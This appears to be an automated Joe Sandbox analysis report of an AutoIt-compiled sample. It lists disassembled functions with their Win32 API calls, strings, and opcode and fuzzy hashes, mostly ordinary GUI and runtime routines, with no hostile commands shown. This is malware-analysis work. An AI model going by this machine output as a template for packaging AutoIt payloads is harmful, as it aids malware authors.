                                                                                        • CreateWindowExW.USER32(00000006,AutoIt v3,?,88C00000,?,?,?,?,00000000,00000000,00000000), ref: 00477633
                                                                                        • GetClientRect.USER32(00000000,?), ref: 0047763F
                                                                                        • CreateWindowExW.USER32(00000000,static,?,50000000,?,00000004,00000500,00000018,00000000,00000000,00000000), ref: 00477683
                                                                                        • CreateDCW.GDI32(DISPLAY,00000000,00000000,00000000), ref: 00477692
                                                                                        • GetStockObject.GDI32(00000011), ref: 004776A2
                                                                                        • SelectObject.GDI32(00000000,00000000), ref: 004776A6
                                                                                        • GetTextFaceW.GDI32(00000000,00000040,?,?,50000000,?,00000004,00000500,00000018,00000000,00000000,00000000,?,88C00000,?), ref: 004776B6
                                                                                        • GetDeviceCaps.GDI32(00000000,0000005A), ref: 004776BF
                                                                                        • DeleteDC.GDI32(00000000), ref: 004776C8
                                                                                        • CreateFontW.GDI32(00000000,00000000,00000000,00000000,00000258,00000000,00000000,00000000,00000001,00000004,00000000,00000002,00000000,?), ref: 004776F4
                                                                                        • SendMessageW.USER32(00000030,00000000,00000001), ref: 0047770B
                                                                                        • CreateWindowExW.USER32(00000200,msctls_progress32,00000000,50000001,?,0000001E,00000104,00000014,00000000,00000000,00000000), ref: 00477746
                                                                                        • SendMessageW.USER32(00000000,00000401,00000000,00640000), ref: 0047775A
                                                                                        • SendMessageW.USER32(00000404,00000001,00000000), ref: 0047776B
                                                                                        • CreateWindowExW.USER32(00000000,static,?,50000000,?,00000037,00000500,00000032,00000000,00000000,00000000), ref: 0047779B
                                                                                        • GetStockObject.GDI32(00000011), ref: 004777A6
                                                                                        • SendMessageW.USER32(00000030,00000000,?,50000000), ref: 004777B1
                                                                                        • ShowWindow.USER32(00000004,?,50000000,?,00000004,00000500,00000018,00000000,00000000,00000000,?,88C00000,?,?,?,?), ref: 004777BB
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.2309816353.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000000.00000002.2309746617.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2309924724.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2309924724.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2310015127.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2310096231.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2310214331.0000000000525000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2310265518.000000000052C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_400000_OVZizpEU7Q.jbxd
                                                                                        Similarity
                                                                                        • API ID: Window$Create$MessageSend$ObjectRect$Stock$AdjustCapsClientDeleteDestroyDeviceFaceFontInfoParametersSelectShowSystemText
                                                                                        • String ID: AutoIt v3$DISPLAY$msctls_progress32$static
                                                                                        • API String ID: 2910397461-517079104
                                                                                        • Opcode ID: 06145267f47237950f9bf2b394788d14c0e7c77fc12a147c01bfcfc54d464a41
                                                                                        • Instruction ID: a65668349d9d90c20bc2e89cb33f711f17b366ce89c6f6fccfd6c75f405f0b1e
                                                                                        • Opcode Fuzzy Hash: 06145267f47237950f9bf2b394788d14c0e7c77fc12a147c01bfcfc54d464a41
                                                                                        • Instruction Fuzzy Hash: C2A18371A00605BFEB14DBA4DC49FAE7BB9EB04714F008129FA14A72E1C774AD44CB68
                                                                                        Function 0046AD10 Relevance: 45.7, APIs: 3, Strings: 23, Instructions: 186COMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • SetErrorMode.KERNEL32(00000001), ref: 0046AD1E
                                                                                        • GetDriveTypeW.KERNEL32(?,0048FAC0,?,\\.\,0048F910), ref: 0046ADFB
                                                                                        • SetErrorMode.KERNEL32(00000000,0048FAC0,?,\\.\,0048F910), ref: 0046AF59
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.2309816353.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000000.00000002.2309746617.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2309924724.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2309924724.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2310015127.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2310096231.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2310214331.0000000000525000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2310265518.000000000052C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_400000_OVZizpEU7Q.jbxd
                                                                                        Similarity
                                                                                        • API ID: ErrorMode$DriveType
                                                                                        • String ID: 1394$ATA$ATAPI$CDROM$Fibre$FileBackedVirtual$Fixed$MMC$Network$PhysicalDrive$RAID$RAMDisk$Removable$SAS$SATA$SCSI$SSA$SSD$USB$Unknown$Virtual$\\.\$iSCSI
                                                                                        • API String ID: 2907320926-4222207086
                                                                                        • Opcode ID: 525cd716a75f6dddbaca68c36b6172640c1f360a49a56ba8d63905ac25315571
                                                                                        • Instruction ID: e912c7b3330773d5b9bf2588ba7fbd63f6bfe130c5f6eb3342ce3002eb002758
                                                                                        • Opcode Fuzzy Hash: 525cd716a75f6dddbaca68c36b6172640c1f360a49a56ba8d63905ac25315571
                                                                                        • Instruction Fuzzy Hash: 2E5186B0648A059ACB04DB61C942DBE73A5EF48708730446FF406B7291EA3DAD62DF5F
                                                                                        Function 004068DC Relevance: 44.0, APIs: 12, Strings: 13, Instructions: 275COMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.2309816353.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000000.00000002.2309746617.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2309924724.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2309924724.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2310015127.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2310096231.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2310214331.0000000000525000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2310265518.000000000052C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_400000_OVZizpEU7Q.jbxd
                                                                                        Similarity
                                                                                        • API ID: __wcsnicmp
                                                                                        • String ID: #OnAutoItStartRegister$#ce$#comments-end$#comments-start$#cs$#include$#include-once$#notrayicon$#pragma compile$#requireadmin$Bad directive syntax error$Cannot parse #include$Unterminated group of comments
                                                                                        • API String ID: 1038674560-86951937
                                                                                        • Opcode ID: 41ccbea35ab77bd0e3d5c2d15770b09f6b6d8aa52c538d81421d7e6c6aae2cd7
                                                                                        • Instruction ID: cb422ad940ebd99c4cbaeb9a9904d1c86e4c1b178c3cf2ebe63a60ccd5d4c750
                                                                                        • Opcode Fuzzy Hash: 41ccbea35ab77bd0e3d5c2d15770b09f6b6d8aa52c538d81421d7e6c6aae2cd7
                                                                                        • Instruction Fuzzy Hash: 3281E3B07002156ADF10BA62EC42FAB3768AF15704F14403BF9067A1C2EB7CDA55C66D
                                                                                        Function 0048A8CA Relevance: 39.2, APIs: 26, Instructions: 187windowCOMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • GetSysColor.USER32(00000012), ref: 0048A903
                                                                                        • SetTextColor.GDI32(?,?), ref: 0048A907
                                                                                        • GetSysColorBrush.USER32(0000000F), ref: 0048A91D
                                                                                        • GetSysColor.USER32(0000000F), ref: 0048A928
                                                                                        • CreateSolidBrush.GDI32(?), ref: 0048A92D
                                                                                        • GetSysColor.USER32(00000011), ref: 0048A945
                                                                                        • CreatePen.GDI32(00000000,00000001,00743C00), ref: 0048A953
                                                                                        • SelectObject.GDI32(?,00000000), ref: 0048A964
                                                                                        • SetBkColor.GDI32(?,00000000), ref: 0048A96D
                                                                                        • SelectObject.GDI32(?,?), ref: 0048A97A
                                                                                        • InflateRect.USER32(?,000000FF,000000FF), ref: 0048A999
                                                                                        • RoundRect.GDI32(?,?,?,?,?,00000005,00000005), ref: 0048A9B0
                                                                                        • GetWindowLongW.USER32(00000000,000000F0), ref: 0048A9C5
                                                                                        • SendMessageW.USER32(00000000,0000000E,00000000,00000000), ref: 0048A9ED
                                                                                        • GetWindowTextW.USER32(00000000,00000000,00000001), ref: 0048AA14
                                                                                        • InflateRect.USER32(?,000000FD,000000FD), ref: 0048AA32
                                                                                        • DrawFocusRect.USER32(?,?), ref: 0048AA3D
                                                                                        • GetSysColor.USER32(00000011), ref: 0048AA4B
                                                                                        • SetTextColor.GDI32(?,00000000), ref: 0048AA53
                                                                                        • DrawTextW.USER32(?,00000000,000000FF,?,?), ref: 0048AA67
                                                                                        • SelectObject.GDI32(?,0048A5FA), ref: 0048AA7E
                                                                                        • DeleteObject.GDI32(?), ref: 0048AA89
                                                                                        • SelectObject.GDI32(?,?), ref: 0048AA8F
                                                                                        • DeleteObject.GDI32(?), ref: 0048AA94
                                                                                        • SetTextColor.GDI32(?,?), ref: 0048AA9A
                                                                                        • SetBkColor.GDI32(?,?), ref: 0048AAA4
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.2309816353.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000000.00000002.2309746617.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2309924724.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2309924724.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2310015127.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2310096231.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2310214331.0000000000525000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2310265518.000000000052C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_400000_OVZizpEU7Q.jbxd
                                                                                        Similarity
                                                                                        • API ID: Color$Object$Text$RectSelect$BrushCreateDeleteDrawInflateWindow$FocusLongMessageRoundSendSolid
                                                                                        • String ID:
                                                                                        • API String ID: 1996641542-0
                                                                                        • Opcode ID: 948a4b4d2e79d2d78f92ac1c6bb7f3af575608a4042223398e5ae106907fc06e
                                                                                        • Instruction ID: 67910f5981194f54d32d2413a419bc6a22b5e02dd88e552ef27f67441b011758
                                                                                        • Opcode Fuzzy Hash: 948a4b4d2e79d2d78f92ac1c6bb7f3af575608a4042223398e5ae106907fc06e
                                                                                        • Instruction Fuzzy Hash: AD514F71901208FFDB10AFA4DC48EAE7B79EF08320F114A2AF911AB2A1D7759D54DF54
                                                                                        Function 004889D5 Relevance: 38.9, APIs: 21, Strings: 1, Instructions: 401windowCOMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • SendMessageW.USER32(?,00000158,000000FF,0000014E), ref: 00488AC1
                                                                                        • SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 00488AD2
                                                                                        • CharNextW.USER32(0000014E), ref: 00488B01
                                                                                        • SendMessageW.USER32(?,0000014B,00000000,00000000), ref: 00488B42
                                                                                        • SendMessageW.USER32(?,00000158,000000FF,00000158), ref: 00488B58
                                                                                        • SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 00488B69
                                                                                        • SendMessageW.USER32(?,000000C2,00000001,0000014E), ref: 00488B86
                                                                                        • SetWindowTextW.USER32(?,0000014E), ref: 00488BD8
                                                                                        • SendMessageW.USER32(?,000000B1,000F4240,000F423F), ref: 00488BEE
                                                                                        • SendMessageW.USER32(?,00001002,00000000,?), ref: 00488C1F
                                                                                        • _memset.LIBCMT ref: 00488C44
                                                                                        • SendMessageW.USER32(00000000,00001060,00000001,00000004), ref: 00488C8D
                                                                                        • _memset.LIBCMT ref: 00488CEC
                                                                                        • SendMessageW.USER32(?,00001053,000000FF,?), ref: 00488D16
                                                                                        • SendMessageW.USER32(?,00001074,?,00000001), ref: 00488D6E
                                                                                        • SendMessageW.USER32(?,0000133D,?,?), ref: 00488E1B
                                                                                        • InvalidateRect.USER32(?,00000000,00000001), ref: 00488E3D
                                                                                        • GetMenuItemInfoW.USER32(?,?,00000000,00000030), ref: 00488E87
                                                                                        • SetMenuItemInfoW.USER32(?,?,00000000,00000030), ref: 00488EB4
                                                                                        • DrawMenuBar.USER32(?), ref: 00488EC3
                                                                                        • SetWindowTextW.USER32(?,0000014E), ref: 00488EEB
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.2309816353.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000000.00000002.2309746617.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2309924724.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2309924724.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2310015127.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2310096231.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2310214331.0000000000525000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2310265518.000000000052C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_400000_OVZizpEU7Q.jbxd
                                                                                        Similarity
                                                                                        • API ID: MessageSend$Menu$InfoItemTextWindow_memset$CharDrawInvalidateNextRect
                                                                                        • String ID: 0
                                                                                        • API String ID: 1073566785-4108050209
                                                                                        • Opcode ID: 9ca3111b61a8f2a25a631b2648e7a23c8cea3a076a4d4f9465d98ca4008b93e0
                                                                                        • Instruction ID: 787a5fb712104ee4b76f4ba17aa60975d6cacfa81cf9944a1fa1b3bb2a4fb8ea
                                                                                        • Opcode Fuzzy Hash: 9ca3111b61a8f2a25a631b2648e7a23c8cea3a076a4d4f9465d98ca4008b93e0
                                                                                        • Instruction Fuzzy Hash: 44E1B370900218AFDB20AF51CC84EEF7BB9EF04710F50456FFA15AA290DB789985DF69
                                                                                        Function 0048488F Relevance: 37.0, APIs: 18, Strings: 3, Instructions: 290windowCOMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • GetCursorPos.USER32(?), ref: 004849CA
                                                                                        • GetDesktopWindow.USER32 ref: 004849DF
                                                                                        • GetWindowRect.USER32(00000000), ref: 004849E6
                                                                                        • GetWindowLongW.USER32(?,000000F0), ref: 00484A48
                                                                                        • DestroyWindow.USER32(?), ref: 00484A74
                                                                                        • CreateWindowExW.USER32(00000008,tooltips_class32,00000000,00000003,80000000,80000000,80000000,80000000,00000000,00000000,00000000,00000000), ref: 00484A9D
                                                                                        • SendMessageW.USER32(00000000,00000432,00000000,00000030), ref: 00484ABB
                                                                                        • SendMessageW.USER32(?,00000439,00000000,00000030), ref: 00484AE1
                                                                                        • SendMessageW.USER32(?,00000421,?,?), ref: 00484AF6
                                                                                        • SendMessageW.USER32(?,0000041D,00000000,00000000), ref: 00484B09
                                                                                        • IsWindowVisible.USER32(?), ref: 00484B29
                                                                                        • SendMessageW.USER32(?,00000412,00000000,D8F0D8F0), ref: 00484B44
                                                                                        • SendMessageW.USER32(?,00000411,00000001,00000030), ref: 00484B58
                                                                                        • GetWindowRect.USER32(?,?), ref: 00484B70
                                                                                        • MonitorFromPoint.USER32(?,?,00000002), ref: 00484B96
                                                                                        • GetMonitorInfoW.USER32(00000000,?), ref: 00484BB0
                                                                                        • CopyRect.USER32(?,?), ref: 00484BC7
                                                                                        • SendMessageW.USER32(?,00000412,00000000), ref: 00484C32
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.2309816353.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000000.00000002.2309746617.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2309924724.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2309924724.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2310015127.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2310096231.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2310214331.0000000000525000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2310265518.000000000052C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_400000_OVZizpEU7Q.jbxd
                                                                                        Similarity
                                                                                        • API ID: MessageSendWindow$Rect$Monitor$CopyCreateCursorDesktopDestroyFromInfoLongPointVisible
                                                                                        • String ID: ($0$tooltips_class32
                                                                                        • API String ID: 698492251-4156429822
                                                                                        • Opcode ID: 943f141a24a5701e169943524c067f38581a5f413d5e7729d13daee1db30ced1
                                                                                        • Instruction ID: 71fd3677379c23cac636b4aadb2286f0fe2b453109396d863f09e4e9c2446b6d
                                                                                        • Opcode Fuzzy Hash: 943f141a24a5701e169943524c067f38581a5f413d5e7729d13daee1db30ced1
                                                                                        • Instruction Fuzzy Hash: EFB15971604341AFDB04EF65C844A6FBBE4BF88314F008A2EF999AB291D775EC05CB59
                                                                                        Function 0046449A Relevance: 36.9, APIs: 16, Strings: 5, Instructions: 179COMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • GetFileVersionInfoSizeW.VERSION(?,?), ref: 004644AC
                                                                                        • GetFileVersionInfoW.VERSION(?,00000000,00000000,00000000,?,?), ref: 004644D2
                                                                                        • _wcscpy.LIBCMT ref: 00464500
                                                                                        • _wcscmp.LIBCMT ref: 0046450B
                                                                                        • _wcscat.LIBCMT ref: 00464521
                                                                                        • _wcsstr.LIBCMT ref: 0046452C
                                                                                        • VerQueryValueW.VERSION(?,\VarFileInfo\Translation,?,?,?,?,?,?,00000000,?,?), ref: 00464548
                                                                                        • _wcscat.LIBCMT ref: 00464591
                                                                                        • _wcscat.LIBCMT ref: 00464598
                                                                                        • _wcsncpy.LIBCMT ref: 004645C3
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.2309816353.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000000.00000002.2309746617.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2309924724.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2309924724.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2310015127.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2310096231.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2310214331.0000000000525000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2310265518.000000000052C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_400000_OVZizpEU7Q.jbxd
                                                                                        Similarity
                                                                                        • API ID: _wcscat$FileInfoVersion$QuerySizeValue_wcscmp_wcscpy_wcsncpy_wcsstr
                                                                                        • String ID: %u.%u.%u.%u$04090000$DefaultLangCodepage$StringFileInfo\$\VarFileInfo\Translation
                                                                                        • API String ID: 699586101-1459072770
                                                                                        • Opcode ID: 4a8df8d6b2a2f92140f321ef03a5422959a184f00704316eedf49522e9d3c310
                                                                                        • Instruction ID: 2b480a1fb6a64e9c247c6b56b60e40bdc72f3d5a191167641815a527c939035c
                                                                                        • Opcode Fuzzy Hash: 4a8df8d6b2a2f92140f321ef03a5422959a184f00704316eedf49522e9d3c310
                                                                                        • Instruction Fuzzy Hash: 7641D431A002107BDB14BA75AC43FBF77ACDF81714F50046FF905A6182FA7C9A4296AE
                                                                                        Function 004027D9 Relevance: 33.5, APIs: 18, Strings: 1, Instructions: 286windowtimeCOMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • SystemParametersInfoW.USER32(00000030,00000000,000000FF,00000000), ref: 004028BC
                                                                                        • GetSystemMetrics.USER32(00000007), ref: 004028C4
                                                                                        • SystemParametersInfoW.USER32(00000030,00000000,000000FF,00000000), ref: 004028EF
                                                                                        • GetSystemMetrics.USER32(00000008), ref: 004028F7
                                                                                        • GetSystemMetrics.USER32(00000004), ref: 0040291C
                                                                                        • SetRect.USER32(000000FF,00000000,00000000,000000FF,000000FF), ref: 00402939
                                                                                        • AdjustWindowRectEx.USER32(000000FF,?,00000000,?), ref: 00402949
                                                                                        • CreateWindowExW.USER32(?,AutoIt v3 GUI,?,?,?,000000FF,000000FF,000000FF,?,00000000,00000000), ref: 0040297C
                                                                                        • SetWindowLongW.USER32(00000000,000000EB,00000000), ref: 00402990
                                                                                        • GetClientRect.USER32(00000000,000000FF), ref: 004029AE
                                                                                        • GetStockObject.GDI32(00000011), ref: 004029CA
                                                                                        • SendMessageW.USER32(00000000,00000030,00000000), ref: 004029D5
                                                                                          • Part of subcall function 00402344: GetCursorPos.USER32(?), ref: 00402357
                                                                                          • Part of subcall function 00402344: ScreenToClient.USER32(004C57B0,?), ref: 00402374
                                                                                          • Part of subcall function 00402344: GetAsyncKeyState.USER32(00000001), ref: 00402399
                                                                                          • Part of subcall function 00402344: GetAsyncKeyState.USER32(00000002), ref: 004023A7
                                                                                        • SetTimer.USER32(00000000,00000000,00000028,00401256), ref: 004029FC
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.2309816353.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000000.00000002.2309746617.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2309924724.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2309924724.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2310015127.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2310096231.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2310214331.0000000000525000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2310265518.000000000052C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_400000_OVZizpEU7Q.jbxd
                                                                                        Similarity
                                                                                        • API ID: System$MetricsRectWindow$AsyncClientInfoParametersState$AdjustCreateCursorLongMessageObjectScreenSendStockTimer
                                                                                        • String ID: AutoIt v3 GUI
                                                                                        • API String ID: 1458621304-248962490
                                                                                        • Opcode ID: a3d4fa0fb9d8ca5ab3dcd1d542b52fc38b8bb78a93eca3457e18c81271885a1f
                                                                                        • Instruction ID: a18fd751d40b92a0f9ce74f9a4650c687106778ef47aaf7a4e9f1722fdb5861d
                                                                                        • Opcode Fuzzy Hash: a3d4fa0fb9d8ca5ab3dcd1d542b52fc38b8bb78a93eca3457e18c81271885a1f
                                                                                        • Instruction Fuzzy Hash: 8AB15075600209EFDB14EFA8DD49BAE77B4FB08314F10463AFA15A62D0DB78A851CB58
                                                                                        Function 0045A439 Relevance: 26.5, APIs: 14, Strings: 1, Instructions: 273windowtimeCOMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • GetClassNameW.USER32(?,?,00000100), ref: 0045A47A
                                                                                        • __swprintf.LIBCMT ref: 0045A51B
                                                                                        • _wcscmp.LIBCMT ref: 0045A52E
                                                                                        • SendMessageTimeoutW.USER32(?,?,00000101,00000000,00000002,00001388,?), ref: 0045A583
                                                                                        • _wcscmp.LIBCMT ref: 0045A5BF
                                                                                        • GetClassNameW.USER32(?,?,00000400), ref: 0045A5F6
                                                                                        • GetDlgCtrlID.USER32(?), ref: 0045A648
                                                                                        • GetWindowRect.USER32(?,?), ref: 0045A67E
                                                                                        • GetParent.USER32(?), ref: 0045A69C
                                                                                        • ScreenToClient.USER32(00000000), ref: 0045A6A3
                                                                                        • GetClassNameW.USER32(?,?,00000100), ref: 0045A71D
                                                                                        • _wcscmp.LIBCMT ref: 0045A731
                                                                                        • GetWindowTextW.USER32(?,?,00000400), ref: 0045A757
                                                                                        • _wcscmp.LIBCMT ref: 0045A76B
                                                                                          • Part of subcall function 0042362C: _iswctype.LIBCMT ref: 00423634
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.2309816353.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000000.00000002.2309746617.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2309924724.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2309924724.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2310015127.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2310096231.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2310214331.0000000000525000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2310265518.000000000052C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_400000_OVZizpEU7Q.jbxd
                                                                                        Similarity
                                                                                        • API ID: _wcscmp$ClassName$Window$ClientCtrlMessageParentRectScreenSendTextTimeout__swprintf_iswctype
                                                                                        • String ID: %s%u
                                                                                        • API String ID: 3744389584-679674701
                                                                                        • Opcode ID: 22f345dc1749fc61d738452cff1ec01fec5d702c3361f6a434a16c0623e3483b
                                                                                        • Instruction ID: eb4c2c17bfd361fdb29ac4d9e78bc58de04dd0089fb3858937583b9ed20721cb
                                                                                        • Opcode Fuzzy Hash: 22f345dc1749fc61d738452cff1ec01fec5d702c3361f6a434a16c0623e3483b
                                                                                        • Instruction Fuzzy Hash: 06A1B431204606BFD714DF60C884BABB7E8FF44316F04462AFD99D2251D738E969CB9A
                                                                                        Function 0045AED4 Relevance: 26.5, APIs: 13, Strings: 2, Instructions: 249COMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • GetClassNameW.USER32(00000008,?,00000400), ref: 0045AF18
                                                                                        • _wcscmp.LIBCMT ref: 0045AF29
                                                                                        • GetWindowTextW.USER32(00000001,?,00000400), ref: 0045AF51
                                                                                        • CharUpperBuffW.USER32(?,00000000), ref: 0045AF6E
                                                                                        • _wcscmp.LIBCMT ref: 0045AF8C
                                                                                        • _wcsstr.LIBCMT ref: 0045AF9D
                                                                                        • GetClassNameW.USER32(00000018,?,00000400), ref: 0045AFD5
                                                                                        • _wcscmp.LIBCMT ref: 0045AFE5
                                                                                        • GetWindowTextW.USER32(00000002,?,00000400), ref: 0045B00C
                                                                                        • GetClassNameW.USER32(00000018,?,00000400), ref: 0045B055
                                                                                        • _wcscmp.LIBCMT ref: 0045B065
                                                                                        • GetClassNameW.USER32(00000010,?,00000400), ref: 0045B08D
                                                                                        • GetWindowRect.USER32(00000004,?), ref: 0045B0F6
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.2309816353.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000000.00000002.2309746617.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
